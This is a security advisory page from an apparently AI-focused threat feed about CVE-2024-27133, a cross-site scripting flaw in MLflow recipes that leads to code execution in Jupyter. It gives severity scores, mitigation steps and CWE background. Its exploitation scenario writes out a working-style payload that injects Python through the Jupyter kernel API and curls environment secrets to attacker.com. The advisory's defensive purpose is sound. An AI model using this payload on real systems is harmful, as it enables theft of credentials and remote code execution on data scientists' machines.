AI Threat Alert

CVE-2024-27133: MLflow: XSS in recipe runner enables Jupyter RCE

CRITICAL PoC AVAILABLE CISA: TRACK*
Published February 23, 2024
CISO Take

MLflow's recipe pipeline renders dataset table fields without sanitization, allowing a crafted dataset to execute JavaScript in Jupyter Notebook and escalate to full RCE on the data scientist's machine. Any team running MLflow recipes against external or third-party datasets is at risk — no credentials required from the attacker. Patch immediately via MLflow PR #10893 and audit all active recipe data source configurations.

What is the risk?

CVSS 9.6 Critical with no authentication required and low attack complexity makes this trivially exploitable at scale. The 'Changed Scope' vector (S:C) accurately reflects how the XSS breaks out of the MLflow rendering context into Jupyter's kernel execution environment, achieving full C/I/A impact. Exposure is highest in organizations where data scientists run MLflow locally or in shared Jupyter environments with access to cloud credentials and model artifacts. No patch was available at time of publication — assess exposure now.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
MLflow pip No patch
26.6K OpenSSF 5.6 655 dependents Pushed 4d ago 31% patched ~51d to patch Full package profile →

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1
9.6 / 10
EPSS
0.7%
chance of exploitation in 30 days
Higher than 46% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C High
I High
A High

What should I do?

6 steps

  1. PATCH

    Apply MLflow fix from PR #10893 immediately. Pin to a patched version and block older versions via package policy.

  2. DATA SOURCE CONTROLS

    Enforce policies requiring only trusted, schema-validated datasets in MLflow recipes. Treat all external datasets as untrusted inputs.

  3. JUPYTER HARDENING

    Run Jupyter with Content-Security-Policy headers; consider JupyterHub with isolated kernels per user and no shared kernel access.

  4. NETWORK SEGMENTATION

    Data science environments should not have broad lateral access to production systems or credential stores.

  5. DETECTION

    Monitor Jupyter kernel execution for unusual outbound network connections or subprocess spawning following dataset load events. Audit kernel execution logs.

  6. CREDENTIALS

    Rotate credentials accessible from data science workstations as a precaution if exposure window was open.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework AML.T0002.000 AML.T0010.002 AML.T0011 AML.T0049 AML.T0050

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - Data for AI systems A.9.3 - Information security for AI systems
NIST AI RMF
GOVERN 1.7 - Organizational processes to address AI risks MANAGE 3.2 - Risk treatment in AI development environments
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-27133?

MLflow's recipe pipeline renders dataset table fields without sanitization, allowing a crafted dataset to execute JavaScript in Jupyter Notebook and escalate to full RCE on the data scientist's machine. Any team running MLflow recipes against external or third-party datasets is at risk — no credentials required from the attacker. Patch immediately via MLflow PR #10893 and audit all active recipe data source configurations.

Is CVE-2024-27133 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-27133, increasing the risk of exploitation.

How to fix CVE-2024-27133?

1. PATCH: Apply MLflow fix from PR #10893 immediately. Pin to a patched version and block older versions via package policy. 2. DATA SOURCE CONTROLS: Enforce policies requiring only trusted, schema-validated datasets in MLflow recipes. Treat all external datasets as untrusted inputs. 3. JUPYTER HARDENING: Run Jupyter with Content-Security-Policy headers; consider JupyterHub with isolated kernels per user and no shared kernel access. 4. NETWORK SEGMENTATION: Data science environments should not have broad lateral access to production systems or credential stores. 5. DETECTION: Monitor Jupyter kernel execution for unusual outbound network connections or subprocess spawning following dataset load events. Audit kernel execution logs. 6. CREDENTIALS: Rotate credentials accessible from data science workstations as a precaution if exposure window was open.

What systems are affected by CVE-2024-27133?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, ML experiment tracking, data science notebooks, MLOps platforms.

What is the CVSS score for CVE-2024-27133?

CVE-2024-27133 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.65%.

What is the AI security impact?

Affected AI Architectures

training pipelinesML experiment trackingdata science notebooksMLOps platforms

MITRE ATLAS Techniques

AML.T0002.000 Datasets
AML.T0010.002 Data
AML.T0011 User Execution
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2, A.9.3
NIST AI RMF: GOVERN 1.7, MANAGE 3.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset. This issue leads to a client-side RCE when running the recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over dataset table fields.

Exploitation Scenario

An adversary with the ability to influence a dataset — via a compromised data pipeline, a malicious public dataset, or a supply chain attack on a data vendor — injects an XSS payload into a column header or cell value, for example: <img src=x onerror="fetch('/api/kernels/KERNEL_ID/execute',{method:'POST',body:JSON.stringify({code:'import subprocess;subprocess.run(["curl","https://attacker.com/exfil?h="+open("/proc/1/environ").read()])'})})"> When a data scientist runs an MLflow recipe referencing this dataset inside Jupyter Notebook, MLflow renders the dataset table without HTML encoding. The payload executes in the notebook's browser context (same origin as the Jupyter server), calls the Jupyter REST kernel API, and injects arbitrary Python code into the running kernel. The attacker achieves silent RCE on the data scientist's machine with no visible indicators — gaining access to ML model weights, training data, and cloud provider credentials stored in environment variables.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

Timeline

Published
February 23, 2024
Last Modified
January 22, 2025
First Seen
February 23, 2024

Related Vulnerabilities

CRITICAL CVE-2025-15379 10.0

MLflow: RCE via unsanitized model dependency specs

Same package: mlflow
CRITICAL CVE-2023-3765 10.0

MLflow: path traversal allows arbitrary file read

Same package: mlflow
CRITICAL CVE-2026-2635 9.8

mlflow: security flaw enables exploitation

Same package: mlflow
CRITICAL CVE-2023-1177 9.8

MLflow: path traversal allows arbitrary file read/write

Same package: mlflow
CRITICAL CVE-2023-2780 9.8

MLflow: path traversal allows arbitrary file read/write

Same package: mlflow
Back to Threat Feed